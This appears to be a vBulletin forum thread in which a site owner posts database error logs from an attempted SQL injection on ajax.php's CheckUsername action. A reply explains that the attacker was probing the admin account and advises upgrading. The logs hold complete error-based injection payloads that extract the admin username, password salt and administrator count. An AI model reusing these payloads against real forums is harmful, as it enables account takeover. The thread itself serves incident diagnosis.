Announcement

Collapse
No announcement yet.

Attempted SQL Injection in ajax.php - Please Help

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Attempted SQL Injection in ajax.php - Please Help

    Hi,

    I got a around 50 MySQL error reports yesterday with a similar query in to Ajax.php. Can anyone help me to find out what they were trying to do?

    Code:
    Database error in vBulletin 3.8.5:
    
    Invalid SQL:
    SELECT COUNT(*) as username FROM `vb_user` WHERE `username` = 'ae15ac777b' UnION SELeCT(selEct(1)fROm(seLEct coUnT(*),conCat((SELECT (SELECT username FROM vb_user WHERE userid=1)),flOor(raNd(0)*2))x fRom vb_setting groUp bY x)a)#';
    MySQL Error   : Duplicate entry 'Admin1' for key 'group_key'
    Error Number  : 1062
    Request Date  : Saturday, April 27th 2013 @ 10:32:05 AM
    Error Date    : Saturday, April 27th 2013 @ 10:32:05 AM
    Script        : http://www.myforum.com/ajax.php?do=CheckUsername&param=ae15ac777b%27+UnION+SELeCT%28selEct%281%29fROm%28seLEct+coUnT%28%2A%29%2CconCat%28%28SELECT+%28SELECT+username+FROM+vb_user+WHERE+userid%3D1%29%29%2CflOor%28raNd%280%29%2A2%29%29x+fRom+vb_setting+groUp+bY+x%29a%29%23
    Referrer      :
    IP Address    : 78.108.63.44
    Username      : Unregistered
    Classname     : vB_Database
    MySQL Version :
    A few more:

    Code:
    nvalid SQL:
    SELECT COUNT(*) as username FROM `vb_user` WHERE `username` = 'a65e57f412' UnION SELeCT(selEct(1)fROm(seLEct coUnT(*),conCat((SELECT (SELECT COUNT(*) FROM vb_user WHERE usergroupid=6)),flOor(raNd(0)*
    
    2))x fRom vb_setting groUp bY x)a)#';
    Code:
    Invalid SQL:
    SELECT COUNT(*) as username FROM `vb_user` WHERE `username` = 'a46b512cee' UnION SELeCT(selEct(1)fROm(seLEct coUnT(*),conCat((SELECT (SELECT salt FROM vb_user WHERE userid=1)),flOor(raNd(0)*2))x fRom vb_setting groUp bY x)a)#';
    
    MySQL Error   : Duplicate entry '6)%1' for key 'group_key'
    Thanks.
    something...

  • #2
    Seem to be trying to get info on the main admin account (usually userid1) and how many administrators you have (usergroup 6).

    You should upgrade to 3.8.7.

    Comment

    widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
    Working...
    X